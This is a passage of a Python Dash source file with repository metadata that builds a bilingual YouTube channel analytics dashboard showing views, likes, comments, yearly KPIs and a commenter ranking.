(\"{:,}\".format(number))\n\ndf_count_video=df.copy()\ndf_count_video['Published_date']=pd.to_datetime(df_count_video['Published_date'])\ndf_card_1_name='影片數量'\ndf_card_1_name_eng='Published Videos'\ndf_count_video_ids=df_count_video['Title'].nunique()\ndf_count_video_ids=value_comma(df_count_video_ids)\n\n# Summary of Video Table\ndf_vidoe_summary=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_vidoe_summary_select=df_vidoe_summary.loc[:,['video_id','Title','Published_date','Views','like_x','comments','duration']]\n# Count Total Views\ndf_card_2_name='總觀看次數'\ndf_card_2_name_eng='Total Views'\ndf_count_total_views=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_total_views=df_count_total_views['Views'].sum()\ndf_count_total_views=value_comma(df_count_total_views)\n\n# Count Total Likes\ndf_card_3_name='總按讚次數'\ndf_card_3_name_eng='Total Views'\ndf_count_total_likes=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_total_likes=df_count_total_likes['like_x'].sum()\ndf_count_total_likes=value_comma(df_count_total_likes)\n\n# Count Total Comments\ndf_card_4_name='總留言次數'\ndf_card_4_name_eng='Total Comments'\ndf_count_total_comments=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_total_comments=df_count_total_comments['comments'].sum()\ndf_count_total_comments=value_comma(df_count_total_comments)\n\n# Show Original Table\ndf_count_video_ids_date=df_count_video.drop_duplicates(subset='Title',keep='first')\ndf_count_video_ids_date['year'] = pd.DatetimeIndex(df_count_video_ids_date['Published_date']).year\ndf_df_count_video_ids_date_datatable=df_count_video_ids_date.loc[:,['year','Published_date','video_id','Title','Views','like_x','comments','duration']]\ndf_df_count_video_ids_date_datatable.Published_date = pd.DatetimeIndex(df_df_count_video_ids_date_datatable.Published_date).strftime(\"%Y-%m-%d\")\n#df_df_count_video_ids_date_datatable.loc[:, 'Views'] =df_df_count_video_ids_date_datatable['Views'].map('{:,.0f}'.format)\n#df_df_count_video_ids_date_datatable.loc[:, 'like_x'] =df_df_count_video_ids_date_datatable['like_x'].map('{:,.0f}'.format)\n#df_df_count_video_ids_date_datatable.loc[:, 'comments'] =df_df_count_video_ids_date_datatable['comments'].map('{:,.0f}'.format)\n\n# Comment Summary and rank\ndf_count_video_comment_user_count=df_count_video\ndf_count_video_comment_user_count=df_count_video_comment_user_count.groupby('Name').count().sort_values('comments',ascending=False)\ndf_count_video_comment_user_count=df_count_video_comment_user_count.loc[:,['comments']]\ndf_count_video_comment_detail=df_count_video\ndf_count_video_comment_summary=df_count_video_comment_detail.merge(df_count_video_comment_user_count,how='inner',on='Name').drop_duplicates(subset='Name',keep='first').sort_values(by='comments_y',ascending=False)\n\n#%%\ndef drawText(card_name,card_name_eng,value):\n card=dbc.CardBody([\n html.Div([\n html.H5(card_name),\n html.H6(card_name_eng),\n html.H3(value,style={\"color\":'#FF2D2B'})\n ], style={'textAlign': 'center'}, className='cardbody') \n ])\n return(card)\n\ndef drawText_2(card_name,card_name_eng):\n card=html.Div([\n html.Span(card_name, style={'align': 'left','font-weight': 'bold','font-size':'18px',\"color\":'#C0FF6B'},className='cardbody_s3_name'),\n html.Br(),\n html.Span(card_name_eng, style={'textAlign': 'left','font-size':'0.83em',\"color\":'#C0FF6B'},className='cardbody_s3_name_eng')\n ], className='cardbody_s3') \n return(card)\ndef drawText_3(value):\n card=html.Div([\n html.Span(value)\n ], className='cardbody_s3_value',style={'textAlign': 'center','margin':'auto'}) \n return(card)\n\ndef unixTimeMillis(dt):\n ''' Convert datetime to unix timestamp '''\n return int(time.mktime(dt.timetuple()))\n\ndef unixToDatetime(unix):\n ''' Convert unix timestamp to datetime. '''\n return pd.to_datetime(unix,unit='s')\n\n#%%\n#Build your components \napp = Dash(__name__, external_stylesheets=[dbc.themes.CYBORG])\ndate=dt.datetime.today().strftime(\"%Y/%m/%d\")\nBig_Title=html.H3('頻道戰指中心', style={\"color\": \"white\",'text-align':'center'})\nSmall_Title=html.H5('YouTube Combat Information Center', style={\"color\": \"#C0FF6B\",'text-align':'center'})\nChannel_logo=html.Img(src=app.get_asset_url('press_play_logo.jpeg'),width=100)\nYouTube_logo=html.Img(src=app.get_asset_url('YouTube_icon.png'),width=100)\nmytitle = dcc.Markdown(children='')\nfig_layout = {'title': 'Dash Data Visualization'}\nselected_year=df_count_video_ids_date['year'].unique()\nviews_graph = dcc.Graph(id=\"views\")\nlikes_graph = dcc.Graph(id=\"likes\")\ndropdown = dcc.Dropdown(df_count_video_ids_date.year.unique(),\n id=\"dropdown\",\n value=2022,\n optionHeight=55,\n clearable=False)\ndatatable=dash_table.DataTable(\n id='datatable-comment',\n columns=[\n {\"name\": i, \"id\": i, \"deletable\": False, \"selectable\": True, \"hideable\": False}\n if i == \"video_id\"\n else {\"name\": i, \"id\": i, \"deletable\": False, \"selectable\": False}\n for i in df_df_count_video_ids_date_datatable.columns],\n data=df_df_count_video_ids_date_datatable.to_dict('records'), # the contents of the table\n editable=False, # allow editing of data inside all cells\n filter_action='none', # allow filtering of data by user ('native') or not ('none')\n sort_action=\"native\", # enables data to be sorted per-column by user or not ('none')\n sort_mode=\"single\", # sort across 'multi' or 'single' columns\n column_selectable=False, # allow users to select 'multi' or 'single' columns\n row_selectable=False, # allow users to select 'multi' or 'single' rows\n row_deletable=False, # choose if user can delete a row (True) or not (False)\n selected_columns=[], # ids of columns that user selects\n selected_rows=[], # indices of rows that user selects\n page_action=\"native\", # all data is passed to the table up-front or not ('none')\n page_current=0, # page number that user is on\n page_size=8, # number of rows visible per page\n style_cell={ # ensure adequate header width when text is shorter than cell's text\n 'width': 0\n },\n style_cell_conditional=[\n {\n 'if': {'column_id': c},\n 'textAlign': 'left'\n } for c in ['Title']]+[\n {\n 'if': {'column_id': b},\n 'textAlign': 'center'\n } for b in ['year','Published_date','video_id']\n ],\n \n style_data={\n 'color': 'black',\n 'backgroundColor': 'white',\n 'font_size': '18px'\n },\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': '#93E9BE',\n }\n ],\n style_header={\n 'backgroundColor': 'black',\n 'color': 'white',\n 'font_size': '18px'\n }\n )\ndatatable_drop_down=dcc.Dropdown(\n id=\"datatable_drop_down\",\n options=df_df_count_video_ids_date_datatable.year.unique(),\n value=2022,\n clearable=False\n )\ndatatable_graph = dcc.Graph(id=\"table_graph\")\ndatatable_check=dcc.Checklist(\n id=\"table_checklist\",\n options=['Views','like_x','comments'],\n value=['Views','like_x','comments'],\n inline=True)\n\n#--------------------\n#X = df_df_count_video_ids_date_datatable[['Views', 'like_x', 'comments']]\n\n#pca = PCA(n_components=3)\n#components = pca.fit_transform(X)\n#total_var = pca.explained_variance_ratio_.sum() * 100\n#fig_test_1 = px.scatter_3d(\n #components, x=0, y=1, z=2,\n #title=f'Total Explained Variance: {total_var:.2f}%',\n #labels={'0': 'PC 1', '1': 'PC 2', '2': 'PC 3'}\n#)\n#-------------------\n\n#Section_3 KPI\ndf_card_wait_name='重要指標'\ndf_card_wait_name_eng='Critical KPI'\ndf_card_wait_value='Waiting Data'\n\ndf_card_s3_1_name='年度發片數量'\ndf_card_s3_1_name_eng='Published Videos'\ndf_card_s3_1_value=html.Span(id='s3_1_value',className='cardbody_s3_value')\n\ndf_card_s3_2_name='年度觀看次數'\ndf_card_s3_2_name_eng='Total Views'\ndf_card_s3_2_value=html.Span(id='s3_2_value',className='cardbody_s3_value')\n\ndf_card_s3_3_name='年度按讚次數'\ndf_card_s3_3_name_eng='Total Likes'\ndf_card_s3_3_value=html.Span(id='s3_3_value',className='cardbody_s3_value')\n\ndf_card_s3_4_name='年度留言次數'\ndf_card_s3_4_name_eng='Total Comments'\ndf_card_s3_4_value=html.Span(id='s3_4_value',className='cardbody_s3_value')\n\ndf_card_s3_5_name='年度平均片長'\ndf_card_s3_5_name_eng='Average Duration'\ndf_card_s3_5_value=html.Span(id='s3_5_value',className='cardbody_s3_value')\n\ndf_card_s3_6_name='平均觀看次數'\ndf_card_s3_6_name_eng='Average Views'\ndf_card_s3_6_value=html.Span(id='s3_6_value',className='cardbody_s3_value')\n\ndf_card_s3_7_name='平均按讚次數'\ndf_card_s3_7_name_eng='Average Likes'\ndf_card_s3_7_value=html.Span(id='s3_7_value',className='cardbody_s3_value')\n\ndf_card_s3_8_name='平均留言次數'\ndf_card_s3_8_name_eng='Average Comments'\ndf_card_s3_8_value=html.Span(id='s3_8_value',className='cardbody_s3_value')\n\n\n# Section 4\ndatatable_comment_rank=dash_table.DataTable(\n id='datatable-comment_rank',\n columns=[\n {\"name\": 'Name', \"id\": 'Name', \"deletable\": False, \"selectable\": True, \"hideable\": False},\n {\"name\": 'Comments_Count', \"id\": 'comments_y', \"deletable\": False, \"selectable\": True, \"hideable\": False}],\n data=df_count_video_comment_summary.to_dict('records'), # the contents of the table\n editable=False, # allow editing of data inside all cells\n filter_action='none', # allow filtering of data by user ('native') or not ('none')\n sort_action=\"native\", # enables data to be sorted per-column by user or not ('none')\n sort_mode=\"single\", # sort across 'multi' or 'single' columns\n column_selectable=False, # allow users to select 'multi' or 'single' columns\n row_selectable=False, # allow users to select 'multi' or 'single' rows\n row_deletable=False, # choose if user can delete a row (True) or not (False)\n selected_columns=[], # ids of columns that user selects\n selected_rows=[], # indices of rows that user selects\n page_action=\"native\", # all data is passed to the table up-front or not ('none')\n page_current=0, # page number that user is on\n page_size=12, # number of rows visible per page\n style_cell={ # ensure adequate header width when text is shorter than cell's text\n 'width': 0\n },\n style_cell_conditional=[\n {\n 'if': {'column_id': c},\n 'textAlign': 'left'\n } for c in ['Title']]+[\n {\n 'if': {'column_id': b},\n 'textAlign': 'center'\n } for b in ['year','Published_date','video_id']\n ],\n \n style_data={\n 'color': 'black',\n 'backgroundColor': 'white',\n 'font_size': '18px'\n },\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': '#93E9BE',\n }\n ],\n style_header={\n 'backgroundColor': 'black',\n 'color': 'white',\n 'font_size': '18px'\n }\n )\n# Comments Ranking\ndf_count_video_comment_summary_top_15=df_count_video_comment_summary.sort_values(by='comments_y',ascending=False).head(15)\ncomments_ranking = px.bar(df_count_video_comment_summary_top_15, y='comments_y', x='Name', text_auto='.2s',\n title=\"留言排行榜
Comments Ranking\")\ncomments_ranking=comments_ranking.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title_font_color='#ffffff',\n font_color='#ffffff')\n#Corrlation Analysis\ncorr=df_vidoe_summary_select.corr()\ncorr_fig=px.imshow(corr,color_continuous_scale='ylgnbu',text_auto=True)\ncorr_fig=corr_fig.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '相關係數
Correlation',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff')\n# Customize your own Layout\napp.layout = html.Div([\n html.Div([\n html.Br(),\n html.Br(),\n dbc.Row([\n dbc.Col([Channel_logo,YouTube_logo],className='logo'), \n dbc.Col([Big_Title,Small_Title],className='title'),\n dbc.Col([])\n ])\n ],className='header'),\n \n html.Br(),\n \n html.Div([\n html.H5(\n [html.Span('頻道名稱 (Channel):',className = 'channel_tw'),\n html.Span('Press Play',className = 'channel_eng')]),\n html.H6(\n [html.Span('當前日期 (Current Date):',className = 'channel_tw'),\n html.Span(date, className = 'channel_eng'),], style={'text-align':'left'}),\n ]),\n \n html.Div([ \n dbc.Row([\n dbc.Col([dbc.Card(drawText(df_card_1_name,df_card_1_name_eng,df_count_video_ids))]),\n dbc.Col([dbc.Card(drawText(df_card_2_name,df_card_2_name_eng,df_count_total_views))]),\n dbc.Col([dbc.Card(drawText(df_card_3_name,df_card_3_name_eng,df_count_total_likes))]),\n dbc.Col([dbc.Card(drawText(df_card_4_name,df_card_4_name_eng,df_count_total_comments))])\n ]), \n ]),\n \n html.Br(),\n \n html.Div([\n html.Div([\n dbc.Row([\n html.H6(['查詢年份'],className='dropdown_text'),\n html.H6(['Please select the year:'],className='dropdown_text'),\n dbc.Col([dropdown], className='dropdown', width=3)])\n ],className='dropdown_1'),\n html.Div([\n dbc.Row([\n dbc.Col([views_graph], width=6,className='views_graph'),\n dbc.Col([likes_graph], width=6,className='likes_graph')])\n ],className='chart_1')\n ],className='chart_section_1'),\n \n html.Br(),\n \n html.Div([\n html.Div([\n html.H5([html.Span('紀錄總覽', className='section_title'),\n html.Br(),\n html.Span('Data Table', className='channel_eng'),\n ], style={'text-align':'center'})\n ],className='dropdown_2'),\n \n html.Div([\n dbc.Row([\n html.H6(['查詢年份'],className='dropdown_text'),\n html.H6(['Please select the year:'],className='dropdown_text'),\n dbc.Col([datatable_drop_down],className='dropdown', width=3)]),\n dbc.Row(dbc.Col([datatable],width={\"size\": 12}))\n ],className='datatable_1')\n ],className='chart_section_2'),\n \n html.Br(),\n \n html.Div([\n html.Div([\n dbc.Row([\n dbc.Col([datatable_graph],className='datatable_graph',width=6),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_1_name,df_card_s3_1_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_1_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_2_name,df_card_s3_2_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_2_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_3_name,df_card_s3_3_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_3_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_4_name,df_card_s3_4_name_eng))],className='section_3_col'),\n dbc.Col([dbc.CardBody(df_card_s3_4_value,style={'textAlign':'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n ],width=3),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_5_name,df_card_s3_5_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_5_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_6_name,df_card_s3_6_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_6_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_7_name,df_card_s3_7_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_7_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n dbc.Card([\n dbc.Row([\n dbc.Col([dbc.CardBody(drawText_2(df_card_s3_8_name,df_card_s3_8_name_eng),style={'margin':'auto'})],className='section_3_col'),\n dbc.Col([dbc.CardBody(drawText_3(df_card_s3_8_value), style={'margin':'auto','textAlign': 'center'}, className=\"card-text\")],className='section_3_col')\n ],className='section_3_card_row',style={'margin':'auto'})\n ],className=\"section_3_card\",style={'width':'400px','height':'100px','margin': 'auto','margin-bottom': '10px'}),\n ],width=3)\n ])\n ])\n ]),\n \n html.Br(),\n \n html.Div([\n html.Div([\n html.H5([html.Span('觀眾分析', className='section_title'),\n html.Br(),\n html.Span('Audience Analysis', className='channel_eng'),\n ], style={'text-align':'center'})\n ],className='section_title')\n ],className='section4'),\n \n html.Div([\n dbc.Row([\n dbc.Col([datatable_comment_rank],width=3,className='datatable_2'),\n dbc.Col(dcc.Graph(figure=comments_ranking),width=6,className='comments_ranking'),\n dbc.Col(dcc.Graph(figure=corr_fig),width=3,className='corr_fig')])\n ]),\n \n\n \n #html.Div([\n #html.Div([\n #dcc.Graph(figure=fig_test_1)\n #])\n #])\n])\n\n\n\n# Callback allows components to interact\n@app.callback(Output(component_id=\"views\",component_property= \"figure\"),\n [Input(component_id=\"dropdown\", component_property=\"value\")])\ndef update_chart(value):\n df=df_count_video_ids_date\n df_selected_year=df['year']==value\n df_selected_year=df[df_selected_year] \n fig_1 = px.line(df_selected_year, \n x='Published_date', \n y=\"Views\")\n fig_1.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '觀看次數時序圖
Views With Time Seqence',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff',\n xaxis=dict(showline=True,\n showgrid=False,\n tickfont=dict(color='#ffffff')),\n yaxis=dict(tickfont=dict(color='#ffffff')),\n )\n fig_1.update_layout(xaxis_rangeslider_visible=True)\n return fig_1\n \n \n@app.callback(Output(component_id=\"likes\",component_property= \"figure\"),\n [Input(component_id=\"dropdown\", component_property=\"value\")])\ndef update_chart(value):\n df=df_count_video_ids_date\n df_selected_year=df['year']==value\n df_selected_year=df[df_selected_year] \n fig_2 = px.bar(df_selected_year,\n x='Published_date',\n y=\"like_x\", \n color='like_x')\n fig_2.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '按讚時序圖
Likes With Time Seqence',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff',\n xaxis=dict(showline=True,\n showgrid=False,\n tickfont=dict(color='#ffffff')),\n yaxis=dict(tickfont=dict(color='#ffffff')),\n )\n fig_2.update_layout(xaxis_rangeslider_visible=True)\n return fig_2\n\n@app.callback(\n Output(\"datatable-comment\", \"data\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_table(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n return dff_selected_year.to_dict(\"records\")\n\n@app.callback(\n Output(\"table_graph\", \"figure\"), \n Input(\"datatable_drop_down\", \"value\"))\ndef update_line_chart(value):\n df=df_count_video_ids_date\n df_selected_year=df['year']==value\n df_selected_year=df[df_selected_year]\n \n fig_3 = go.Figure()\n fig_3.add_trace(go.Scatter(x=df_selected_year['Published_date'], \n y=df_selected_year['Views'],\n mode='lines+markers',\n name='Views')),\n fig_3.add_trace(go.Scatter(x=df_selected_year['Published_date'], \n y=df_selected_year['like_x'],\n mode='lines+markers',\n name='Like')),\n fig_3.add_trace(go.Scatter(x=df_selected_year['Published_date'], \n y=df_selected_year['comments'],\n mode='lines+markers',\n name='Comments'))\n\n fig_3.update_layout(plot_bgcolor='#111111',\n paper_bgcolor='#111111',\n title = dict(text = '數據疊加圖
Data Table Chart',x = 0.5),\n title_font_size=22,\n title_font_color='#ffffff',\n font_color='#ffffff',\n xaxis=dict(showline=True,\n showgrid=False,\n tickfont=dict(color='#ffffff')),\n yaxis=dict(tickfont=dict(color='#ffffff')),\n )\n fig_3.update_layout(xaxis_rangeslider_visible=True)\n return fig_3\n\n\n@app.callback(\n Output(\"s3_1_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_1_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['video_id'].count()\n return value_comma(dff_selected_year_video_sum)\n\n\n@app.callback(\n Output(\"s3_2_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_2_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['Views'].sum()\n return value_comma(dff_selected_year_video_sum)\n\n@app.callback(\n Output(\"s3_3_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_3_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['like_x'].sum()\n return value_comma(dff_selected_year_video_sum)\n\n@app.callback(\n Output(\"s3_4_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_4_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_sum=dff_selected_year['comments'].sum()\n return value_comma(dff_selected_year_video_sum)\n\n@app.callback(\n Output(\"s3_5_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_5_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year['duration'] = pd.to_datetime(dff_selected_year['duration']).dt.time.astype(str)\n tsum = dt.timedelta()\n count = 0\n for single_time in dff_selected_year['duration']:\n t = dt.datetime.strptime(single_time,'%H:%M:%S')\n tdelta = dt.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second, microseconds=t.microsecond)\n tsum = tsum + tdelta\n count = count + 1\n taverage = tsum / count\n average_time = str(taverage).split(\".\")[0]\n return average_time\n\n@app.callback(\n Output(\"s3_6_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_6_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_mean=dff_selected_year['Views'].mean()\n return value_comma(dff_selected_year_video_mean).split(\".\")[0]\n\n@app.callback(\n Output(\"s3_7_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_7_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_mean=dff_selected_year['like_x'].mean()\n return value_comma(dff_selected_year_video_mean).split(\".\")[0]\n\n@app.callback(\n Output(\"s3_8_value\", \"children\"), \n Input(\"datatable_drop_down\", \"value\")\n)\ndef display_s3_8_value(value):\n dff = df_df_count_video_ids_date_datatable\n dff_selected_year=dff['year']==value\n dff_selected_year=dff[dff_selected_year]\n dff_selected_year_video_mean=dff_selected_year['comments'].mean()\n return value_comma(dff_selected_year_video_mean).split(\".\")[0]\n\n# Run app\nif __name__=='__main__':\n app.run_server(debug=False)\n\n\n\n# %%\n\n\n# %%\n", "repo_name": "humphreyshen/War_Room", "sub_path": "01_War_Room.py", "file_name": "01_War_Room.py", "file_ext": "py", "file_size_in_byte": 29371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 59, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 73, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 74, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 74, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 75, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 75, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 76, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 76, "usage_type": "name"}, {"api_name": "dash.html.H3", "line_number": 77, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 77, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 83, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 83, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 84, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 84, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 85, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 85, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 86, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 86, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 90, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 90, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 91, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 91, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 97, "usage_type": "call"}, {"api_name": "datetime.timetuple", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 101, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 105, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.themes", "line_number": 105, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 106, "usage_type": "attribute"}, {"api_name": "dash.html.H3", "line_number": 107, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 107, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 108, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 108, "usage_type": "name"}, {"api_name": "dash.html.Img", "line_number": 109, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 109, "usage_type": "name"}, {"api_name": "dash.html.Img", "line_number": 110, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 110, "usage_type": "name"}, {"api_name": "dash.dcc.Markdown", "line_number": 111, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 111, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 114, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 114, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 115, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 115, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 116, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 116, "usage_type": "name"}, {"api_name": "dash.dash_table.DataTable", "line_number": 121, "usage_type": "call"}, {"api_name": "dash.dash_table", "line_number": 121, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 172, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 172, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 178, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 178, "usage_type": "name"}, {"api_name": "dash.dcc.Checklist", "line_number": 179, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 179, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 205, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 205, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 209, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 209, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 213, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 213, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 217, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 217, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 221, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 221, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 225, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 225, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 229, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 229, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 233, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 233, "usage_type": "name"}, {"api_name": "dash.dash_table.DataTable", "line_number": 237, "usage_type": "call"}, {"api_name": "dash.dash_table", "line_number": 237, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 288, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 288, "usage_type": "name"}, {"api_name": "plotly.express.imshow", "line_number": 296, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 296, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 304, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 304, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 305, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 305, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 306, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 306, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 307, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 307, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 308, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 309, "usage_type": "call"}, {"api_name": 